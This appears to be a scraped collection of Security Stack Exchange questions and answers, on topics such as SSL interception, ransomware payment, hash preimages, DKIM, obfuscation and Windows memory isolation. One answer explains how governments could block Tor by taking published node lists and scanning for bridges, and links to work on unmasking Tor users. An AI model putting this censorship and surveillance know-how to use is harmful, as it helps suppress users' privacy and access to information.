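    shares = split_secret(secret, m=3, n=5)               # any 3 of 5 admins can recover it
    assert recover_secret(shares[:3]) == secret
    assert recover_secret(shares[1:4]) == secret

Each admin then keeps one share wherever they control, and the hit-by-a-bus document only needs to list who holds a share and how to run the recovery step.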
{ "source": [ "https://security.stackexchange.com/questions/106855", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70458/" ] }
106,896
Is there any particular reason why the Steam application attempts to be so secure? It seems to force you to take more security measures (two-factor authentication, emails confirming all trades, etc) than most banks do. Is this due to the fact that the Steam software has some inherent security risks associated, or is it just because they want to avoid people complaining that their account was hacked? Is there any reason that Steam attempts to be more secure than most banks?
Steam has about 100 million users ( random link saying they had 75 million almost 2 years ago ). If they spend on average $10 per year, we're talking $1,000,000,000 per year - and I'd say that's a conservative estimate ( random link saying they had 1 billion in revenue back in 2010 ). That's the same kind of money small banks deal with . Then there is almost certainly a large number of low tech attackers . Steam is used by a lot of kids who don't yet have a proper understanding of legality, so at least some of them will try to steal the account of that other kid that smells funny. To be clear: "some" of 100 million is "lots". These attackers often live in the same town and maybe even saw the other kid typing in the password before, which breaks some traditional safeties based on IP range and passwords. Stolen accounts create customer support costs. Widespread reports of stolen accounts create bad press, which destroys trust. For a digital market, trust is money. Valve also works with a huge number of partners. These partners can act maliciously and try to break/abuse the billing process , which will directly hurt Steam's reputation and therefore lose Valve some serious money, unless the abuse is detected and dealt with swiftly. EDIT: [...] enough money now moves around the system that stealing virtual Steam goods has become a real business for skilled hackers [...] We see around 77,000 accounts hijacked and pillaged each month. - 9 Dec 2015 http://store.steampowered.com/news/19618/ So in addition to a large number of low tech attackers, there's a large number of high tech attackers as well.
{ "source": [ "https://security.stackexchange.com/questions/106896", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64559/" ] }
106,910
By my admittedly limited understanding of how HTTPS/TLS works, the end user (me) initiates a connection with a remote server which signs every one of its messages with a public key. This public key can be verified (magically) by checking the certificate, which is signed by a CA that vouches for the integrity of that certificate. The upshot of this is that if I trust a CA, that CA can sign any certificate and say it is valid and my machine will be just fine with it; if a rogue CA is added to the trusted registry of my computer, then anyone who knows that rogue CA will be able to get their cert signed and pose as - potentially - any website and perform a man in the middle attack. My corporation has just added their own cert as a root CA to all computers in the network. Should I therefore assume that all traffic I send is compromised?
Yup. Yes. (If you consider "my company's admins can change my HTTP(S) traffic" a compromise.) The exception is programs that pin their certificates and fail if another certificate is used.

That's pretty much the idea of SSL inspection: open up SSL/TLS, do some anti-virus scanning, close up SSL/TLS again. And in place of that "do some anti-virus scanning" you can substitute any manipulation of the traffic you want.

But on the other hand: whoever can install a root CA on your system has superuser power already. So there are a million other ways they can interfere or listen in.
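One way to see whether a given connection is actually being intercepted is to look at who issued the certificate your machine receives for a site: behind an SSL-inspecting proxy the issuer will be your company's CA rather than a public one. A rough Python sketch (it assumes the Python installation trusts the corporate root, otherwise the handshake itself will fail; the hostname is a placeholder):

    import socket
    import ssl

    def certificate_issuer(host, port=443):
        # Return the issuer of the certificate presented to us for this host.
        ctx = ssl.create_default_context()
        with socket.create_connection((host, port), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                cert = tls.getpeercert()
        # 'issuer' is a sequence of relative distinguished names (name/value pairs)
        return {name: value for rdn in cert["issuer"] for name, value in rdn}

    print(certificate_issuer("www.example.com"))   # placeholder hostname

Browsers show the same information in their certificate viewer, which is usually the quicker check.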
{ "source": [ "https://security.stackexchange.com/questions/106910", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81656/" ] }
106,914
Follow up from comments on another question . Is there any reason as to why you might install yourself as a root CA on your own network? The only reason I can think of is forcing computers in the network to trust your own self signed certificates instead of getting them digitally signed by a 3rd party CA.
A custom CA is required if you want to use https on your corporate intranet. 3rd party CAs can only give you certificates for public domains. They won't give you certificates for intranet.local or any other hostnames which are only routed in your own network. So when you want to have a certificate for your intranet or for the web interface of your own servers, you need to add a custom CA and sign it yourself. You might ask yourself "Why would I use https on my own network"? There is currently a trend to implement everything as a browser-based application. This means more and more processes are handled through internal web interfaces, including sensitive ones. For example, our company is currently implementing a web-based intranet application to view our own payslips (and hopefully only our own). But in larger organizations, the internal network can become so large and complex that you can't really speak of a private LAN anymore. Eavesdropping from internal attackers becomes a possibility which can not be handwaved away, so internal encryption becomes a reasonable precaution.
{ "source": [ "https://security.stackexchange.com/questions/106914", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81656/" ] }
106,953
About two months ago, I deployed an Ubuntu server with as main purpose serving a web app. However, I'm still developing the app and only gave the server IP to my coworker and some friends for testing. Yesterday I checked the fail2ban logs and noticed many SSH bruteforce attempts from China, France etc. that dated to before I gave out the IP. I also checked my server access logs and noticed some malicious attempts on URLs from the same IPs, trying to bruteforce SSH. One example of a request they made is myip/otherip/file.php . I'm not sure how to interpret this. I traced back the IP of that server and it's on the same hosting company I'm on. Question : How did they find out about the IP of the server before I even served the app from it or gave it out? My guess : I'm guessing it is some bot that keeps trying on different IPs of some pattern that leads to servers of the same hosting company. Is that a correct assumption, or are there other possibilities?
Your guess is likely correct. The big server hosters have contiguous IP ranges from which they assign IPs to their customers. Low-budget hosters are frequently used by amateurs who don't know what they are doing, so it's likely that they use easy-to-guess passwords or set up insecure web applications. This makes these IP ranges valuable targets for black-hats. When you notice such attacks from within the hoster's network, you should report them to the hoster, because this is very likely a breach of the terms of use... or the attack is coming from another customer's server where the black-hats were already successful.
{ "source": [ "https://security.stackexchange.com/questions/106953", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93270/" ] }
107,025
There are many tools to obfuscate .NET applications. The free ones do some basic obfuscation, while commercial ones seem to promise more. My question is: Is it worth using the commercial obfuscation tools? Do they provide some security? I know everything is crackable if someone wants it badly. But I am talking about "average" attackers. So is it worth investing money in commercial obfuscators? In case anyone is interested, what I want to protect is program logic and/or keys (I know keys should not be stored in the app, but I am limited in where I can store them anyway due to context). Note: Some users are mentioning that an obfuscator may sometimes introduce bugs into a working program. This is clearly bad. It would also be useful if someone could share their experience with this kind of behaviour. Is this behaviour different for commercial vs free obfuscators?
The problem with client-side obfuscation/protection is that the attacker will always win. Your code runs on his PC, so he can intercept and manipulate everything in the end. In the specific case of .NET it might make sense to apply basic obfuscation to remove function names, for example, but free tools are perfectly fine for that. To answer your question a bit more specifically: most commercial obfuscators do the same things that free ones do as well. I'd go for Confuser/ConfuserEx; both are open source and provide better protection than most commercial stuff.
{ "source": [ "https://security.stackexchange.com/questions/107025", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
107,065
For example, when I enter this URL: https://www.google.com/search?q=example or http://www.google.com/search?q=example I can see the word example that I was searching on Google. Can the ISP see this URL and so maybe register it in their logs?
The ISP

- can see GET and POST parameters of websites that don't use SSL
- can see DNS requests (-> which domains did you visit)

So in your example the ISP would not see the search request, as GET parameters are encrypted with SSL (ref). Conclusion: the ISP would know THAT you searched on Google but it wouldn't know WHAT you searched for.
{ "source": [ "https://security.stackexchange.com/questions/107065", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91265/" ] }
107,081
There are many different hash functions: MD5, SHA, and others. They take a value V and produce a value H via a transformation Function(V) = H, where Function is MD5, SHA, etc. My question is: does every hash value H have a value V? For example, given the MD5 hash value f2c057ed1807c5e4227737e32cdb8669 (totally random), can we find what it was from? In other words, if we list all hashes:

    00000000000000000000000000000000
    00000000000000000000000000000001
    ...
    fffffffffffffffffffffffffffffffe
    ffffffffffffffffffffffffffffffff

Can we find a value for each one of them?

Edit (from OP's comment): I want to know if there exists an input for each possible output. I'm not interested in finding the inverse.
My question is: Does every hash value H have a value V? For example, given md5 hash value f2c057ed1807c5e4227737e32cdb8669 (totally random), can we find what it was from? These are actually two very different questions: whether there is an input for each output, and whether we can find an input for each output. For your first question: we do not know. For a given hash function, the number of possible inputs is a lot bigger than the number of possible outputs, so we would find it very surprising if the function was not surjective (i.e. if there was an output without any matching input). For instance, with MD5, there are 2 128 possible outputs, and 2 18446744073709551616 -1 possible inputs, so we expect that each output has, on average, about 2 18446744073709551488 corresponding inputs. It is rather implausible that there is an output with no corresponding input. However, we do not know how to prove it. To a large extent, we expect that property to be very hard to prove for any concrete hash function (such a proof of surjectivity would not, per se, be a weakness of the function, but, handwavingly, the security of a hash function relies on the intractability of its structure with regards to that kind of analysis). For your second question: we strongly hope that it is infeasible. This is what is called preimage resistance : for a given output y , it should not be computationally feasible to find a x such that h ( x ) = y . Even if it was mathematically proven that such an input must exist (it is not proven, but it is strongly suspected, as explained above), it should still be atrociously expensive to actually find it. If the hash function is "ideal" then the best possible attack is luck : you try out possible inputs until a match is found. If the output has size n bits, then "luck" should work with an average effort of 2 n ; with n large enough (and n = 128 is large enough), this is way out of what can be done with existing computers. A hash function is said to be resistant to preimages if "luck" is still the best known attack. It is known that MD5 is not ideally resistant to preimages, because an attack with effort 2 123.4 has been found -- about 10 times faster than 2 128 , but still a long way into the realm of infeasibility, so that attack is theoretical only. I would like to point out two things, though: If I give you h ( x ) for an unknown x , but you have some idea about the x that I used (e.g. you know that x is a "password" that a human user could choose and remember), then you can try possible x values that match that idea. The actual average effort for finding a preimage to h ( x ) is the smaller of 2 n and M /2, where M is the size of the space of possible inputs x . For a "raw" preimage attack, all sequences of bits are possible inputs, so M is huge and the cost is 2 n . However, if, in a specific context, x is known to be taken out of a relatively small space, then finding the "right" x can be substantially faster. As pointed out above, preimages are not supposed to be unique: for a given y , a large number of values x should exist, that hash to y . Thus, for a given output, you do not find "the" corresponding input, but "a" corresponding input, which may or may not be the "right" one. And the third question ? Indeed, trying to make a complete map of inputs-to-outputs is yet something different. As @Xander pointed out, the number of possible MD5 outputs (2 128 ) is too large to be stored anywhere on Earth; it exceeds the cumulated size of all hard disks that have ever been built. 
However, if you could solve that storage issue, then it is possible to think about the cost of making a complete map. If you use the "luck" attack on all 128-bit outputs independently, you may expect an overall cost of 2^256 (2^128 times a cost of 2^128). However, you can do much better by handling all outputs simultaneously, i.e. trying out random (or sequential) inputs and simply populating your big table as you obtain the outputs. With effort 2^128, you should get about 63% of your complete map, while the "independent luck" method would need an effort of a bit more than 2^255 to achieve the same result.

Edit: as was pointed out by @Owen and @kasperd, the arguments on the number of inputs are not actually sufficient to imply surjectivity; the internal function structure matters. MD5 and SHA-1 are Merkle–Damgård functions, meaning that they are built as follows:

- There is an inner pseudorandom permutation P: for an input block b of a given size (512 bits in the case of MD5 and SHA-1), P_b is a permutation of the space of sequences of exactly n bits (n = 128 for MD5, n = 160 for SHA-1).

- A compression function is defined as:

      f(b, x) = P_b(x) + x

  That is, for block b, we apply the permutation corresponding to b on the second input x, and then we "add" x to the output of that permutation. (In the case of MD5 and SHA-1, that addition is done on a 32-bit word basis, but the details do not matter here.)

- To process a complete input message m, the message is first padded with extra bits so that the total size becomes a multiple of the block size; the padding also encodes the original message length. The padded input is then split into successive blocks b_0, b_1, and so on. A register r is initialized to a conventional value of size n bits (the "IV", specified in the MD5 and SHA-1 standards). Blocks are then processed one by one: to inject block b_i, we compute f(b_i, r), and the output is the new value of r. When all blocks have been processed, r contains the complete hash function output.

The addition step in the compression function turns the pseudorandom permutation P_b into a pseudorandom function. A relevant consequence is that, for a given value b, f(b, x) is very unlikely to be surjective. In fact, we expect the values f(b, x), over all 2^n inputs x, to cover only about 63% of all possible 2^n sequences of n bits.

This processing has interesting consequences. First, consider all inputs of size exactly 1 GB (the "traditional" gigabyte of exactly 1073741824 bytes): there are 2^8589934592 such sequences, i.e. a lot more than 2^128. However, when applying MD5 on all these messages, they will all be padded with exactly one extra block (8589934592 = 16777216×512, so an extra block of size 512 will be appended), and, furthermore, this final block will be the same for all 1 GB inputs (it encodes the input length but is otherwise deterministic, with no randomness and no dependence on the values of the input bits). Let's call b_z that final block. MD5 on a 1 GB input message m thus begins with a lot of processing on the first 16777216 blocks, resulting in a 128-bit value x, and the hash output MD5(m) is equal to f(b_z, x). Therefore, all 1 GB messages ultimately go through a single, final invocation of the same compression function f(b_z, x), so we expect the hash outputs to cover only about 63% of all 128-bit sequences. This example demonstrates that the argument on the number of inputs to the hash function is incomplete (though it gives the right idea).
Conversely, if we consider all messages of exactly 300 bits in length, then they will all be hashed as f(b, IV), with 2^300 distinct blocks b. We thus have 2^300 pseudorandom permutations P_b, all applied on the same 128-bit input (the IV), yielding 2^300 128-bit results which are all, then, supposed to be uniformly distributed over the space of 128-bit values. Adding IV to all of them does not change that uniformity. In that case, the counting argument works and thus surjectivity becomes highly probable.

Edit 2: About the "63%". When you generate a random value, uniformly, in a space of size N, then the probability of hitting a given value x is 1/N; thus, the probability of not hitting a given value x is (N-1)/N. Now try it N times: you generate N values randomly, uniformly and independently (in particular, you may generate the same value several times). For a given x, the probability of not being part of these N values is the probability of having been missed N times, i.e.:

    P = ((N-1)/N)^N

This can be approximated as follows:

    P = e^(N·ln(1 - 1/N)) = e^(N·(-1/N + o(1))) = e^(-1 + o(1))

Thus, with big values of N, the probability of any given value being missed approaches 1/e. Therefore, the expected coverage of the space of size N, with N random values, is close to 1 - (1/e). This is approximately 63.21%.
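As a quick empirical check of that 63% figure (my own illustration, not part of the original argument), the same experiment can be run on a toy-sized hash: MD5 truncated to 16 bits gives an output space of N = 2^16 values, and hashing N random inputs should cover roughly 1 - 1/e of it.

    import hashlib
    import math
    import os

    BITS = 16            # deliberately tiny output space so the experiment runs instantly
    N = 2 ** BITS

    def tiny_hash(data: bytes) -> int:
        """MD5 truncated to BITS bits, standing in for a 'random' function."""
        return int.from_bytes(hashlib.md5(data).digest(), "big") >> (128 - BITS)

    seen = set()
    for _ in range(N):
        seen.add(tiny_hash(os.urandom(16)))

    print(f"covered {len(seen) / N:.2%} of the {BITS}-bit output space")
    print(f"1 - 1/e = {1 - 1 / math.e:.2%}")   # theoretical expectation, about 63.21%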
{ "source": [ "https://security.stackexchange.com/questions/107081", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57387/" ] }
107,285
A company I support/do work for has been hit with ransomware. I've gone down all the data recovery paths etc ... and the business has decided that paying the ransom is cheaper than rebuilding and trying to recover. My question is: has anyone gone through the process of paying a ransomware company? Once you pay, do the bad guys send you a private key and if so, how do you use it to decrypt files? EDIT: (by request, as people asked for more information below and it might help some others who find this topic) As far as the type goes, I think it might be a variant of CryptoLocker. The application was nowhere to be found after the hit. I ran 3 different AV scans and found no signs of anything. All I had to go on was this image: I narrowed the attack down to CryptoWall 4.0 judging by the URL being used. I traced that URL to a mailing list for Snort and saw CryptoWall 4.0 being mentioned. Here is a forum topic with some talk that matches what I am seeing here, for those interested.
First, determine which variant of ransomware you've been hit by. Depending on which one, you may have more options. As @Ohnana has said, ransomware operators are generally true to their word; it's in their interest, after all. If it became known that certain groups never allowed data to be decrypted, they'd stop getting money from their victims. That being said, I'd suggest that before you pay it is important to try and establish which variant you've become a victim of. There are freely available decryption tools for several variants, and there's at least one documented variant which contains a bug that makes decryption impossible. Once you've established which variant you have, you will be able to quickly research what you can expect the decryption process to be, and whether you can do it using a free tool rather than by paying the ransomware operator.
{ "source": [ "https://security.stackexchange.com/questions/107285", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31084/" ] }
107,413
I am currently receiving an order of computer parts in the mail including an SSD. Tracking showed that the package arrived in my town on day X, and was originally scheduled for delivery on day X as well. Tracking now says it is going to be delivered on day (X+3). Being the paranoid person that I am, is there a reason to fear that the SSD is being tampered with/malware installed on it? Is there anything I can do before/when I install the OS in order to check for tampering?
If you don't want to be at risk, in the future get a third party to purchase stuff like this in cash, from a store not near your house or work. You should see if you can download firmware for the drive from the manufacturer's site. Update the firmware on the drive, or at least check its signature. Remember, it is near Christmas and shipping is likely to take longer than normal.
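If the manufacturer publishes a checksum or signature alongside the firmware image, a simple first check is to hash the downloaded file and compare it with the published value. A minimal Python sketch (the file name and the vendor hash below are placeholders, not real values); note that this only validates the download itself, which is why re-flashing a known-good image is the stronger step:

    import hashlib

    # Placeholders: substitute the real file name and the checksum published by the vendor.
    FIRMWARE_FILE = "ssd_firmware_update.bin"
    VENDOR_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

    def sha256_of(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):  # read in 1 MiB chunks
                h.update(chunk)
        return h.hexdigest()

    digest = sha256_of(FIRMWARE_FILE)
    print("computed:", digest)
    print("match" if digest == VENDOR_SHA256 else "MISMATCH: do not flash this image")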
{ "source": [ "https://security.stackexchange.com/questions/107413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81872/" ] }
107,417
It occurred to me that DKIM-verified emails, from major players (e.g., GMail), could open the door to more modern OpenPGP robot key signing authorities . The idea would be to ask people to send a key signing request to a known address (e.g., [email protected]), and to sign their request with their OpenPGP key. The DKIM signature of that email would then be checked so as to verify that the requester has control over the claimed account (i.e., that GMail, for example, asserts that the email was sent by a valid / authenticated user). If everything checks out, the bot would sign the corresponding identity in the sender's public key, and send it back. My understanding is that DKIM makes it much more difficult to spoof an email address when the "From:" header is included in the DKIM signature. So, I ask the community here, what are some weaknesses or limitations of this approach? Here are some of the issues that I've considered:

- In the past, DKIM keys were much too short (< 1024-bit RSA). This has been resolved.
- DKIM public keys are hosted as DNS records, and plain-old DNS can be spoofed (perhaps pinning can be used for major players).
- DKIM keys are perhaps less protected than other security credentials, as their primary purpose is to combat spam and phishing (no solution?).

Are there other dangers I'm overlooking? NOTE: For what it's worth, it would appear that keybase.io is toying with this idea ( https://github.com/keybase/keybase-issues/issues/373 )
{ "source": [ "https://security.stackexchange.com/questions/107417", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93809/" ] }
107,490
I came across this article saying that after the November 2015 Paris attacks , some French police officers proposed to ban Tor. Tor is used to circumvent censorship! What security techniques would governments use to block Tor?
In order to block Tor, all that has to be done is to obtain the current list of Tor nodes, which can be found at the following link: http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv and then block them bi-directionally via the routers or firewalls. That said, there will be numerous ways around such efforts: people can still use VPNs to connect outside of a given area and then run the Tor traffic from another location, or tunnel the traffic through, but this will effectively block many of the less technical people from accessing Tor.

Similarly, the following list of Tor exit nodes could be useful for blocking Tor traffic from connecting to any given websites: https://check.torproject.org/exit-addresses

I would say it's easy to make Tor hard to use, but extremely hard to make it impossible to use. Keep in mind that governments with large financial resources can spend money to run tools like ZMAP.io to find potential Tor servers, including Tor bridges, minutes after they are started. Continuously scanning the entire IPv4 address space has become trivial for those with even a small budget, so a campaign to find and block Tor nodes could easily be very effective, but it will never be absolute. Finally, keep in mind that once Tor users have been identified, the government would likely monitor future connections by those users to locate new Tor bridges or similar connections.

Note: The task of scanning IPv4 has become trivial, but scanning all of the public IPv6 address space would be radically unmanageable due to the scale. That said, a large government project correlating other types of data, such as NetFlow, some type of traffic signatures, or some other form of identification, would be required to identify and block Tor traffic on IPv6 networks. Again, governments can make Tor hard to use, but it's extremely hard to make it impossible to use.

It should be further noted that governments also leverage additional tactics to identify anonymous users. To protect end-users from risks related to cookies or other signatures which may give away additional information about Tor users, it may be wise to use an anonymous live CD such as the following: https://www.whonix.org/ https://tails.boum.org/

Torflow visualization may also be of interest: https://torflow.uncharted.software

Related article: 81% of Tor Users Can be Easily Unmasked By Analyzing Router Information http://thehackernews.com/2014/11/81-of-tor-users-can-be-easily-unmasked_18.html

Another related article about a much more dangerous but related issue: Tor Browser Exposed https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95
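As an illustration of the blocking approach described above (a sketch of my own, not part of the original answer): the exit-address list published by the Tor Project consists of plain-text lines, including ones of the form "ExitAddress <ip> <timestamp>", which can be turned into firewall rules mechanically. The iptables chains below are just the standard INPUT/OUTPUT chains and would need adapting to a real router or firewall configuration.

    import urllib.request

    EXIT_LIST_URL = "https://check.torproject.org/exit-addresses"

    def fetch_exit_ips(url: str = EXIT_LIST_URL) -> set:
        """Parse the Tor Project's exit-address list and return the exit IPs."""
        with urllib.request.urlopen(url) as resp:
            text = resp.read().decode("utf-8", errors="replace")
        return {line.split()[1] for line in text.splitlines()
                if line.startswith("ExitAddress ")}

    if __name__ == "__main__":
        for ip in sorted(fetch_exit_ips()):
            # Block traffic to and from each exit node ("bi-directionally", as above).
            print(f"iptables -A INPUT  -s {ip} -j DROP")
            print(f"iptables -A OUTPUT -d {ip} -j DROP")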
{ "source": [ "https://security.stackexchange.com/questions/107490", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93895/" ] }
107,506
I have a chat application built in Java. The chat app stores a log of the user Jimmy's chats locally on his machine. I want this chat log to be encrypted so if someone uses the computer (authorized or unauthorized) he cannot simply read all of Jimmy's chats. I would like Jimmy's chats to only be readable when Jimmy is logged in. As soon as he logs out, the chats should be encrypted and unreadable. Any ideas on how this sort of scheme could be implemented?
{ "source": [ "https://security.stackexchange.com/questions/107506", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90688/" ] }
107,542
My company has just introduced a new VPN policy whereby, once connected, all traffic is routed through the company network. This is to allow for improved monitoring of data theft. It would appear that this policy also performs a man-in-the-middle attack on HTTPS traffic. What this practically means for me is that visiting " https://google.com " will give me a certificate error. Upon inspection, the certificate is signed by my company's (self-signed) certificate. To me this is hurting security in one area to help it in another. Is this common practice in big companies? Can someone point me to an ISO standard?
"Is this common practice in big companies?"

Yes. The feature is available in most enterprise firewalls and also several firewalls for smaller companies. It is even available in the free web proxy Squid . And several personal firewalls have implemented it too. As more and more sites (both harmless and harmful) move to https:// , expect that the usage of SSL interception will increase too, because nobody likes to have a firewall which fails to protect a system because it is blind regarding encrypted traffic.

"Can someone point me to an ISO standard?"

SSL interception just makes use of the existing SSL and PKI standards. There is no need for a new standard which defines how SSL interception works. As for the Cyber Security Standards : I'm not aware of any which explicitly require SSL interception, but I don't have much knowledge of these kinds of standards. But even if it is not explicitly required, it might be implicitly expected that you either block access to an SSL site or do SSL interception when the standard demands traffic monitoring.

"will give me a certificate error."

SSL interception needs you to trust the intercepting CA. In most companies these CA certificates are centrally managed and installed on all computers, but if you use a browser like Firefox it might not help, because Firefox has its own CA store and does not use the system's CA store.

"To me this is hurting security in one area to help it in another."

Yes, it is breaking end-to-end encryption to detect malware and data leakage which use encrypted connections. But since the breakage of end-to-end encryption is done in full control of the company and you still have encryption to the outside world, this is a trade-off most companies are willing to take. But note that in the past, bugs were detected in several SSL interception products (like the same CA shared between different companies, no revocation checks...) which additionally weakened the security.
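A quick way to see whether a given HTTPS connection is being intercepted is to look at who issued the certificate your machine actually receives. A small Python sketch (the host is just an example; it assumes the intercepting CA has been installed in the system trust store, as described above):

    import socket
    import ssl

    HOST = "google.com"   # example target; any external HTTPS site works

    ctx = ssl.create_default_context()           # uses the default / system trust store
    with socket.create_connection((HOST, 443), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
            cert = tls.getpeercert()             # the served leaf certificate, as a dict

    issuer = {k: v for rdn in cert["issuer"] for (k, v) in rdn}
    print("issuer:", issuer.get("organizationName"), "/", issuer.get("commonName"))
    # A public CA here suggests no interception on this path; your company's own CA
    # name means the TLS traffic is being intercepted and re-signed.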
{ "source": [ "https://security.stackexchange.com/questions/107542", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1363/" ] }
107,546
In his book Security Engineering, Anderson really focuses on how in the 90s and early 2000s programs would need to access memory that wasn't their own, and programmers programmed with the assumption that the program would be run with administrative privileges:

"The latest Microsoft system, Vista, is trying to move away from running all code with administrator privilege, and these three modern techniques are each, independently, trying to achieve the same thing — to get us back where we'd be if all applications had to run with user privileges rather than as the administrator. That is more or less where computing was in the 1970s, when people ran their code as unprivileged processes on time-shared minicomputers and mainframes. Only time will tell whether we can recapture the lost Eden of order and control ..., and to escape the messy reality of today... but certainly the attempt is worth making."

In particular this quote:

"PCs carry an unfortunate legacy, in that the old single-user operating systems such as DOS and Win95/98 let any process modify any data; as a result many applications won't run unless they are run with administrator privileges and thus given access to the whole machine."

Does this mean that ideas such as these , where you can assign any address to a pointer and get access to that memory, would work on Windows 95/98? Why would they design it this way, and what would be the benefit of reading some other program's memory (or writing to it!)?

    int *firefoxmemory = (int *) 0x11111111; // this is just an example of an address
    *firefoxmemory = 200; // screw firefox
Memory isolation

Your example wouldn't work on Windows 95, but it did work on DOS and Windows up to 3.11 (not Windows NT).

The PC architecture, and the Microsoft series of operating systems, started with the Intel 8086 processor and an operating system ( DOS ) designed to run a single program at a time. You would run a program, and when you were finished with it, you'd exit it, so overwriting the data of another process wasn't really a concern. (You could have programs that remained in memory after exiting ; they were essentially part of the operating system.)

The Intel 80386 processor changed the deal by being the first of its lineage to have a memory management unit (MMU) . An MMU is a hardware component that provides virtual memory by translating virtual addresses (pointers in a program) to physical addresses (actual locations in RAM¹). Windows 95 was the first in its lineage to take advantage of it: each Windows 95 application ran with its own MMU configuration, so that *firefoxmemory would either point into the program's own address space (in which case whatever bad thing it did could only affect that program) or not point anywhere at all (in which case the program — and not the whole system — would crash).

Windows 3.0–3.11 took advantage of some of the 386's novelties, but they ran all applications in the same address space. This was due to several factors:

- a requirement to keep old Windows 1.x/2.x applications running (they were designed to run on single-address-space hardware, and many took advantage of that to poke into OS internals to achieve things that weren't possible through documented interfaces);
- lack of development time to redesign the whole operating system based on a completely different architecture;
- a requirement to run on computers that had little RAM: keeping applications isolated does cost more memory on a scale of 2 MB or 4 MB (because data has to be copied between programs, and because the operating system has to keep track of all program interactions to allow applications to communicate and to regulate the communication).

It wasn't so much that the operating system was explicitly designed to allow programs to access each other's memory, but that there was no way to prevent it. When ways to prevent it became affordable, it took a few OS versions to take advantage of them.

For example, let's consider a feature such as inter-program copy-paste (clipboard). If you don't have memory isolation, this can be implemented by having the source program keep a copy of the data in its own memory; when the data is pasted in another program, that other program copies the data directly from the source program. The only thing the operating system needs to track is who currently owns the clipboard. If applications' memory is isolated, the operating system needs to arrange for the data copying, and possibly to store a copy of the data independently of the source application. This requires more development work to write this code, and more resources to store this code in memory and run it.

I've simplified a number of things here; for more about how an operating system uses an MMU to isolate applications, you can read How the kernel can prevent a malicious program to operate? , How can two identical virtual addresses point to different physical addresses? , Is it possible to support multiple processes without support for Virtual memory? (they're Unix-oriented but the principles apply to Windows or any OS you're likely to encounter on a PC).
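The per-process address space that the MMU provides can be demonstrated directly on any modern Unix-like system. The following small Python sketch (my own illustration, Unix-only because it relies on os.fork) shows two processes holding the "same" virtual address while a write in one never appears in the other, because that address is mapped to different physical pages in each process:

    import os

    data = [0]                       # lives at some virtual address in this process
    print("virtual address (id):", hex(id(data)))

    pid = os.fork()
    if pid == 0:
        # Child: same virtual address, but a private copy of the page behind it.
        data[0] = 200
        print("child  sees data[0] =", data[0], "at", hex(id(data)))
        os._exit(0)
    else:
        os.waitpid(pid, 0)
        # Parent: unaffected by the child's write; the address spaces are isolated.
        print("parent sees data[0] =", data[0], "at", hex(id(data)))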
Privilege isolation

In this passage, Anderson isn't actually discussing memory isolation, but privilege isolation, where a running program is prevented from affecting certain parts of the system. Memory isolation is necessary, but not sufficient. The operating system must also control the ways processes interact, control what files they open, etc. Even with each application running in its own memory space, applications can interact. Memory isolation merely forces applications to use operating system services (via system calls to a kernel which can access all memory) to interact.

The Windows 1.x/3.x/9x/ME series of operating systems was designed as a single-user operating system and did not isolate applications. Memory isolation was added in Windows 95, but only to improve stability, not to implement security restrictions. These operating systems have no security restrictions: if you run a program on your machine, it is allowed to do everything. (This is of course helpful to virus writers.) The memory space is isolated, but not the file space.

The Windows NT/2000/XP/… series of operating systems, like operating systems in the Unix family, was designed as a multi-user operating system, which introduces a basic security goal: what a user does should not adversely affect what other users can do. So the operating system has to enforce, for example, that programs executed by Alice cannot interact with programs executed by Bob, cannot modify Bob's files, etc. Programs and data that are part of the operating system concern every user and so should be protected from all users. (Of course, some interactions are allowed by explicit permission, e.g. a network server does process requests that it receives from the network, Bob can change a file's permissions to be writable by others, some users are granted administrative privileges and so can modify the operating system, etc.)

A great many applications were written to target Windows 9x, which had no security restrictions. So they took liberties such as writing to the operating system directory (under Windows 95, copying the file to the Windows directory was the normal way to install a shared library). Much of what these applications did was considered somewhat messy even by the standards of that time, but it worked, so people did it. Versions of Windows from the NT series (which includes all versions since XP) necessarily broke some of these applications, though Microsoft did add a number of workarounds (such as pretending that writing a file to a shared directory succeeded, but actually writing it to a user-specific directory).

Windows XP enforced user isolation, but most installations wouldn't take advantage of it: many installations just had the user be an administrator, so all the programs they ran had the privileges to do pretty much anything. There were two main reasons for that:

- It allows badly-behaved legacy applications to run. While most such applications are only used by a small proportion of users, many users do run such applications, and it takes a long time and a huge effort to renew them all.
- Introducing privileges means that sometimes the user will be told that something can't be done because of a lack of privileges. Witness the complaints about Vista, that it would keep showing those privilege escalation prompts.

Application isolation

If you're young enough to have discovered computers through portable devices, you may be used to a model of isolation centered on applications, rather than users.
In the Unix and Windows model, Alice's data is protected from Bob. Applications are neutral in the security model: they just execute under the identity of the logged-in user. This means that the application code has to be trusted not to misbehave. Windows has traditionally coped with misbehaving applications by trying to detect and contain them through antivirus software . That doesn't work too well. Unix systems, especially Linux, tend to cope by distributing more software through traceable channels from which malware is eliminated.

Operating systems designed for mobile devices, in particular iOS and Android, don't trust application developers, so applications are isolated; for example, each application has its own file space. This has a security benefit, but also a significant cost in that it reduces what applications can do. Applications require privileges to modify operating system behavior (e.g. to create shortcuts and, more generally, automation), you can't easily manipulate the same file in different applications, you can't easily allow multiple applications to display information at the same time, etc. Or, to take a more dramatic example, you can't write a debugger with restricted privileges, because the whole point of a debugger is to snoop on and perturb the execution of the application that's being debugged. This cost is why the mobile application isolation model can't just be grafted onto a PC environment.
